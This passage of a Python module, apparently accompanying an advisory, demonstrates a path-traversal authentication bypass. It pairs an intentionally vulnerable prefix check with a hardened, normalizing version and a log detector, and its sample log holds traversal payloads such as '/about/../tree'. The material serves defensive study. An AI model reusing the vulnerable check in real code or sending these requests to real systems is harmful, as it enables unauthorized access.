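"/statics/pageChallenge.html") come from the advisory; the exemption rule
and the access-log excerpt are constructed assumptions.
"""
import posixpath
import re
from urllib.parse import unquote

PUBLIC_PATHS = {"/about"}          # exact paths reachable without login
PUBLIC_PREFIXES = ("/statics/",)   # login page assets


def raw_path(request_target):
    """Path component of an origin-form request target, without decoding."""
    return request_target.partition("?")[0] or "/"


def normalize_path(request_target):
    """Decode once, then collapse '//', '.' and '..' segments."""
    path = re.sub(r"/+", "/", unquote(raw_path(request_target)))
    # normpath on an absolute path discards a leading ".." (nothing above "/").
    return posixpath.normpath(path)


def authorize_vulnerable(request_target, authenticated):
    """Raw-path check: anything that starts with "/about" is treated as public."""
    path = raw_path(request_target)
    if path.startswith("/about") or path.startswith(PUBLIC_PREFIXES):
        return 200
    return 200 if authenticated else 401


def authorize_hardened(request_target, authenticated):
    """Decide on the canonical path the backend will actually serve."""
    path = normalize_path(request_target)
    if path in PUBLIC_PATHS or path.startswith(PUBLIC_PREFIXES):
        return 200
    return 200 if authenticated else 401


# Constructed access-log excerpt in common log format; the timestamps echo
# the Date headers of the advisory's listings.
SAMPLE_LOG = """\
192.168.1.50 - - [30/Aug/2021:08:39:24 +0000] "GET /about?action=get HTTP/1.1" 200 3673
192.168.1.50 - - [30/Aug/2021:08:42:11 +0000] "GET /about/../tree?action=get HTTP/1.1" 200 3808
192.168.1.50 - - [30/Aug/2021:08:43:33 +0000] "GET /about/%2e%2e/account?action=list HTTP/1.1" 200 793
192.168.1.50 - - [30/Aug/2021:08:45:00 +0000] "GET /statics/pageChallenge.html HTTP/1.1" 200 1200
"""
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE) (\S+) HTTP/')


def traversal_hits(log_text):
    """Request targets whose raw path differs from its canonical form.

    A legitimate client of this interface never needs dot segments or
    encoded slashes, so every such request is worth an alert.
    """
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        if normalize_path(target) != raw_path(target):
            hits.append(target)
    return hits


if __name__ == "__main__":
    for target in ("/tree?action=get", "/about/../tree?action=get"):
        print(target, authorize_vulnerable(target, False), authorize_hardened(target, False))
    print(traversal_hits(SAMPLE_LOG))
```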